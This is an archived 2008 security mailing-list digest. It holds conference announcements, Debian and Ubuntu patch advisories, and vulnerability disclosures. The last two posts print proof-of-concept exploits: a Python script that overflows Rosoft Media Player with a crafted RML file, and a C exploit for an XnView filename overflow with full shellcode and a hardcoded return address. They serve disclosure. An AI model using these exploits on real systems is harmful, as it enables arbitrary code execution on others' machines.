Black Hat Announcements: New CFP system and Japan '08 confirmed

2008-03-15 Thread jmoss 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

BugTraq readers, here is a big Black Hat update to keep inquiring minds up
to date with all the goings on in our not-so-secret lair:

Black Hat Amsterdam is a go! 

Training: 25-26 March 2008 Briefings: 27-28 March 2008 There will be four
different tracks over two days comprised of over 20+ internationally
renowned security professionals speaking on diverse topics from intercepting
GSM traffic and the evolution of spam techniques to attacking Anti Virus
products and new client side channels:
https://www.blackhat.com/html/bh-europe-08/bh-eu-08-main.html


Black Hat USA News:
We're very proud to announce a new feature for paid Black Hat attendees
starting with the USA show in August - delegate access to our CFP system!
Paid delegates can now log into our CFP database, read and review our
proposed presentations and share their ratings and comments with Black Hat.

Your ratings will help us create the show you want to attend, and even help
focus presentations as they're being created. We are excited to see what
kind of information we learn about what interests our delegates and what
kind of talks meet their needs best.  We've always said that our delegates
make Black hat the experience it is, and we're glad to have the opportunity
to extend their influence on the final product. To read more about this new
opportunity, go to:
https://www.blackhat.com/html/blackpages/blackpages.html

We're also unveiling an Un-Track where attendees create their own mash-up
style presentations - so if you've got something to share with the security
community, this is your moment.

Continuing a popular new BH development, we will also have speaker QA rooms
after every presentation to help you follow up with your speaker and network
with likeminded delegates. Still have a question that didn't quite get
answered? Follow your speaker and continue the conversation. 

Registration is now OPEN for The Black Hat Briefings USA, register now to
take advantage of our early bird rates:

Black Hat Briefings USA 2008, August 2-7 at the Caesars Palace Las Vegas

Early registration rate closes May 1, 2008.

Regular registration rate closes July 1, 2008.
https://www.blackhat.com/html/bh-registration/bh-registration.html#USA

The Black Hat USA Call for Papers is now open. For descriptions of the
tracks and deadlines check out:
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-cfp.html

To create or update a submission:
https://cfp.blackhat.com/

Download all the Black Hat USA 2007 content for free in an iPod friendly
format! For audio and video follow these links:
https://www.blackhat.com/podcast/bh-usa-07-video.rss
https://www.blackhat.com/podcast/bh-usa-07-audio.rss


Black Hat Japan News:
We're happy to announce that Black Hat is returning to Tokyo for another
Black Hat Japan in October 2008. We'll be bringing another strong lineup of
speakers and trainers and the best lineup of technical security
presentations available in Japan. We hope to see you there!

About Black Hat

The Black Hat Briefings are a series of highly technical information
security conferences that bring together thought leaders from all facets of
the infosec world - from the corporate and government sectors to academic
and even underground researchers. The environment is strictly vendor-neutral
and focused on the sharing of practical insights and timely, actionable
knowledge. Black Hat remains the best and biggest event of its kind, unique
in its ability to define tomorrow's information security landscape. 

15 years at the intersection of network security and hacker ingenuity is
what makes Black Hat the one-of-a-kind conference it is, one where the
establishment and the underground are equally at home.

In addition to the large number of short, topical presentations in the
Briefings, Black Hat also provides hands-on, high-intensity, multi-day
Trainings. The Training sessions are provided by some of the most respected
experts in the world and many also provide formal certifications to
qualifying attendees. Arrangements can also be made to bring Black Hat's
trainers to your location for private and customized training.

Subscribe to the Black Hat RSS feed to keep up to date on news,
announcements, and content:
https://www.blackhat.com/BlackHatRSS.xml

UNSUBSCRIBE:
These announcements get sent to past Black Hat attendees. If you wish to
stop receiving them just reply saying so and I'll remove you from the list.

Jeff Moss
Director
Black Hat


-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.7.0 (Build 1012)
Charset: us-ascii

wsBVAwUBR9saXUqsDNqTZ/G1AQjHRAf+Kzu1JM+3uJfDYb4lnTzog1lPcT9bmKhI
Odwbpae5ISCKoJq3LQ20COwPdnEappUSvZPwO8KCfAxtub6eeHDIsKc03AoordGb
T+4V3KFJ2Bp+/lKNySA5X3SX+87VpTgo9kycmHSW6XmsIj+q1UKdHAtxXDhKYOnS
aulcInOm9adjU/Zexzq04om+ojOAEVwnbpPykaqYtEg05Lmn2Rgznm9O1wPOMYyG
blbnU5kWdEjDpeyHDRQlSw3YrtNYfREM0ElT8oztWyxLIqNK+qqMKuARXC8Tqyin
7qaX3U41qfZq6TNlAGzVPzBA6afd39WffWIDXrvUZ8oJ1FvuaHRE1g==
=tDr8
-END PGP

Local persistent DoS in Windows XP SP2 Taskmgr

2008-03-15 Thread SkyOut 

Dear list,

after weeks of total ignorance by Microsoft I decided to finally  
release all information
related to a bug, that has to do with the Windows XP SP2 Taskmanager.  
Manipulating
a Registry key makes it possible to disable the Taskmgr. On the next  
startup it will crash with
an error message. It is possible to backup the key and repair the  
Registry doing so, but
the attack scenario is clear: A virus uses this code, the user can't  
open the Taskmgr anymore

and your process is somehow hidden.

The full information about this bug, can be found here:
http://core-security.net/archive/2008/march/index.php#14032008

And the exploit is available here:
http://core-security.net/releases/exploits/taskmgr_dos.c.txt

Greets,
SkyOut

---
core-security.net
---

[SECURITY] [DSA 1516-1] New dovecot packages fix privilege escalation

2008-03-15 Thread Florian Weimer 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1516-1[EMAIL PROTECTED]
http://www.debian.org/security/ Florian Weimer
March 14, 2008  http://www.debian.org/security/faq
- --

Package: dovecot
Vulnerability  : privilege escalation
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-1199 CVE-2008-1218
Debian Bug : 469457

Prior to this update, the default configuration for Dovecot used by
Debian runs the server daemons with group mail privileges.  This means
that users with write access to their mail directory by other means
(for example, through an SSH login) could read mailboxes owned by
other users for which they do not have direct write access
(CVE-2008-1199).  In addition, an internal interpretation conflict in
password handling has been addressed proactively, even though it is
not known to be exploitable (CVE-2008-1218).

Note that applying this update requires manual action: The
configuration setting mail_extra_groups = mail has been replaced
with mail_privileged_group = mail.  The update will show a
configuration file conflict in /etc/dovecot/dovecot.conf.  It is
recommended that you keep the currently installed configuration file,
and change the affected line.  For your reference, the sample
configuration (without your local changes) will have been written to
/etc/dovecot/dovecot.conf.dpkg-new.

If your current configuration uses mail_extra_groups with a value
different from mail, you may have to resort to the
mail_access_groups configuration directive.

For the stable distribution (etch), these problems have been fixed in
version 1.0.rc15-2etch4.

For the unstable distribution (sid), these problems have been fixed in
version 1.0.13-1.

For the old stable distribution (sarge), no updates are provided.
We recommend that you consider upgrading to the stable distribution.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.dsc
Size/MD5 checksum: 1300 8146ccf246ed64e1ac8c0127489ec798
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15.orig.tar.gz
Size/MD5 checksum:  1463069 26f3d2b075856b1b1d180146363819e6
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.diff.gz
Size/MD5 checksum:   102991 21959fc45cf0f8932fa9eb890791ff39

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_alpha.deb
Size/MD5 checksum:   583482 a0d18885da096140ceb4110d525569d4
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_alpha.deb
Size/MD5 checksum:  1379844 6103bce830848d3f9bb4347f5c9b94f0
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_alpha.deb
Size/MD5 checksum:   621320 48127903af1fe2130cb84c57e5a607ff

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_amd64.deb
Size/MD5 checksum:  1222430 1c2e1ffeb6bf745ed88cde01c62d264a
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_amd64.deb
Size/MD5 checksum:   536634 4f64ed0cc16510e9c3d709342b3c57ca
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_amd64.deb
Size/MD5 checksum:   569588 c17bac715f188f55ae20e5a3c95109b1

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_arm.deb
Size/MD5 checksum:  1123030 47eb9fddcc68c2c213afa10c8e3d8747
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_arm.deb
Size/MD5 checksum:   506134 0f4d939f2cf68f4e5b01140c846e50bc
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_arm.deb
Size/MD5 checksum:   537564 82310ae4e42406429f8ade7cbb81abf0

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_hppa.deb
Size/MD5 checksum:  1298818 603d12284115b6349e1d0334263d2af0
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_hppa.deb
Size/MD5 checksum:   562192 413ac964849698428c1b08e9cc9075bc

Troopers08 Security Conference, April 23/24 (Munich/Germany)

2008-03-15 Thread Enno Rey 
Troopers08 Presentations


Keynote on Invulnerable Software - Dan Bernstein

KIDS - Kernel Intrusion Detection System - Rodrigo Branco

State of Security - Andrew Cushman, Microsoft

Release of the next revision of the free Exploit-Me series of application 
penetration testing tools - Nish Bhalla, Security Compass

Side Channel Analysis - Job de Haas, Riscure

Hackertools according to German law (? 202c StGB) - Horst Speichert, Lawyer

Hardening Oracle in Corporate Environments - Alexander Kornbrust, 
Red-Database-Security

Virtualization: There is no spoon - Michael Kemp

Straight Talk about Cryptography - Jon Callas, PGP

Evilgrade: You have pending upgrades - Francisco Amato

Self defending networks - hype or essential need for international 
organisations? - Rolf Strehle, VOITH AG

Keynote Virtualization: Floor Wax, Dessert Topping and The End of Information 
Security As We Know It? - Christopher Hoff, Unisys

GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft

Incident Management - tasks and organization. - Volker Kozok, German Ministry 
of Defense

A penetration testing learning kit - Ariel Waissbein, Core Security

Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College

Hacking Second Life(TM) - Michael Thumann, ERNW GmbH

Enterprise Webapplication Security [EMAIL PROTECTED] S.E., Dr. Johannes Raab  
Thomas Stocker, Allianz S.E.

Tapping $$$ Enterprises - Pierre Kroma

Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim

SCADA and National Critical Infrastructures: is security an optional? - Raoul 
Chiesa

Data Loss Protection - Hope or Hype. - Enno Rey  Angus Blitter


--

Additional Pre-Con Latenight Talks
PacketWars
Evening Fun

thanks,

-- 
Enno Rey



ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey

[USN-586-1] mailman vulnerability

2008-03-15 Thread Kees Cook 
=== 
Ubuntu Security Notice USN-586-1 March 15, 2008
mailman vulnerability
CVE-2008-0564
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mailman 2.1.5-9ubuntu4.2

Ubuntu 6.10:
  mailman 1:2.1.8-2ubuntu2.1

Ubuntu 7.04:
  mailman 1:2.1.9-4ubuntu1.2

Ubuntu 7.10:
  mailman 1:2.1.9-8ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

NOTE: Due to an internal release testing mistake, earlier
published mailman versions 1:2.1.9-4ubuntu1.1 (for Ubuntu
7.04) and 1:2.1.9-8ubuntu0.1 (for Ubuntu 7.10) accidentally
included an incorrect patch and caused a regression, as reported in
https://launchpad.net/bugs/202332

This update includes fixes for the problem.  We apologize for the
inconvenience.

Details follow:

Multiple cross-site scripting flaws were discovered in mailman.
A malicious list administrator could exploit this to execute arbitrary
JavaScript, potentially stealing user credentials.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.diff.gz
  Size/MD5:   231090 d3e7124adf9454e2754e41c98df1a79c

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.dsc
  Size/MD5:  626 0ac6344f31b1fd756ff3c724a059c907

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5.orig.tar.gz
  Size/MD5:  5745912 f5f56f04747cd4aff67427e7a45631af

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_amd64.deb
  Size/MD5:  6613254 72d9727b248c5e8ac1ffe6699989b546

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_i386.deb
  Size/MD5:  6612872 6fa80a2c5f9fb4ef86fc37f5948eb7ea

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_powerpc.deb
  Size/MD5:  6621726 45ad75a62c903f80ccaed21d8bff8e0f

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_sparc.deb
  Size/MD5:  6620818 7dc3bc18e981e78fa7d9e18bda151ecc

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.diff.gz
  Size/MD5:   203009 ee4a019ea676c82f040bad51a13f2a04

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.dsc
  Size/MD5:  819 53355a3ca08c288d785123da51dbb10e

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8.orig.tar.gz
  Size/MD5:  6856039 b9308ea3ffe8dd447458338408d46bd6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_amd64.deb
  Size/MD5:  8017888 34628b56f38515676c840c10f2aa100d

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_i386.deb
  Size/MD5:  8016276 18b60f0774f2f664d5505391834ed0c6

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_powerpc.deb
  Size/MD5:  8025122 20b2783ab25dd270751211463fdedc77

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_sparc.deb
  Size/MD5:  8023672 02dd507266718e196abef08311a995b5

Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.diff.gz
  Size/MD5:   142531 2e32aeebcbf3d45e498d4241bf1cf0c8

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.dsc
  Size/MD5:  981 0c8c78087bcf0213f17013c94fea9764

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9.orig.tar.gz
  Size/MD5:  7829201 dd51472470f9eafb04f64da372444835

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_amd64.deb
  Size/MD5:  8606862 74502c6c9e9a8bb277c6f741abd46541

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_i386.deb
  Size/MD5:  8605384 46330ecad45d07957ac827e5f8e944e2

  powerpc architecture (Apple

Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow

2008-03-15 Thread opexoc 
Description:

This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, 
similar to one discovered by Juan Pablo Lopez Yacubian. 

This one concerns RML file. This is Stack Based Buffer Overflow vulerability - 
we can ovewrite EIP. I hope that it was not reported before. 


Author: Wiktor Sieroci#324;ski

POC:


#!/usr/bin/python


content = (

#EXTINF:Played=0\n + A * 5000 + \n

)


fd = open(music.rml,w);

fd.write(content)

fd.close();


print RML FILE CREATED

XNview 1.92.1 Long Filename Overflow

2008-03-15 Thread Sylvain 

*XNview*


Informations :
** 
Version : 1.92.1
Website : http://www.xnview.com/
Problem : Long Filename Overflow


Description:

XnView is an efficient multimedia viewer, browser, and converter. It supports 
more than 400 graphic file formats (PNG, JPEG, TARGA, TIFF, GIF, BMP, and 

more).

Details :
*
The problem is that XNview doesn't handle long file names.It result in an 
exploitable buffer overflow which allow execution of arbitrary code.

POC:

#include windows.h
#include unistd.h  

/*
Shellcode
Size=164 octets
Action: open calc.exe
*/
unsigned char shellcode[] =
\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16
\x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1
\x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd
\x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99
\x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2
\x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0
\x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f
\x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc
\x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90
\x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec
\x73\x77\x0b\x94;

/*
user32.dll ret adress == jmp ebp
under Win XP pro SP2
*/
unsigned char ret[] =\x34\x59\x40\x7e;


int main(int argc,char *argv[]){
char *bufExe[3];
char buf[511];
bufExe[0] = xnview.exe;
bufExe[2] = NULL;
memset(buf,0x90,511);
memcpy(buf[260],ret,4);   
memcpy(buf[330],shellcode,sizeof(shellcode));   
bufExe[1] = buf;
  
execve(bufExe[0],bufExe,NULL);
return 0x0;
}

Disclosure Timeline:

04 February 2008 - Discovery
12 February 2008 - Vendor notification
13 February 2008 - Vendor reply
14 March2008 - Release of XNview 1.93.1
15 March2008 - Public Disclosure

Credits:

Author : Sylvain THUAL
Original advisory(French) : 
http://www.click-internet.fr/index.php?cki=Newsnews=9 
E-mail : [EMAIL PROTECTED]
Website : http://www.click-internet.fr